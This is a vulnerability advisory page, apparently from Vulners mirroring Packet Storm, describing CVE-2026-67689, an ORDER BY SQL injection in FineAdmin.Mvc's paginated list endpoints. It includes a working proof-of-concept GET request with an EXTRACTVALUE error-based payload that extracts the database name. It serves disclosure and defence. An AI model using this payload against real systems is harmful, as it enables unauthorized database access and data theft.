Lucene search
+L

📄 FineAdmin.Mvc SQL Injection

🗓️ 05 Aug 2026 00:00:00Reported by zyhType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 8 Views

CVE-2026-67689: FineAdmin.Mvc SQL injection in ORDER BY for list endpoints via unsanitized field and order.

Code
CVE-2026-67689: FineAdmin.Mvc ORDER BY Clause SQL Injection
    CVE ID
    CVE-2026-67689
    
    Description
    FineAdmin.Mvc is vulnerable to SQL injection via the field and order parameters in paginated list endpoints. The BaseService.GetListByFilter() and GetPageUnite() methods directly concatenate pageInfo.field and pageInfo.order into the ORDER BY clause via string.Format() with no whitelist validation or sanitization.
    
    In MySQL, ORDER BY supports expressions, subqueries, and function calls, enabling EXTRACTVALUE()/UPDATEXML() error-based injection and SLEEP() time-based blind injection.
    
    Proof of Concept (PoC)
    Error-based injection — extract database name:
    
    GET /Permissions/User/List?page=1&limit=10&field=EXTRACTVALUE(1%2CCONCAT(0x7e%2CDATABASE()%2C0x7e))&order=desc HTTP/1.1
    Cookie: Loginkey=<SESSION>
    Expected response:
    
    {"state":"error","message":"XPATH syntax error: '~fineadmin~'"}
    
    
    Impact
    Broader attack surface — 5+ endpoints affected
    ORDER BY injection in MySQL offers more exploitation vectors than string-based injection
    Credit
    Discoverer: zyh

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation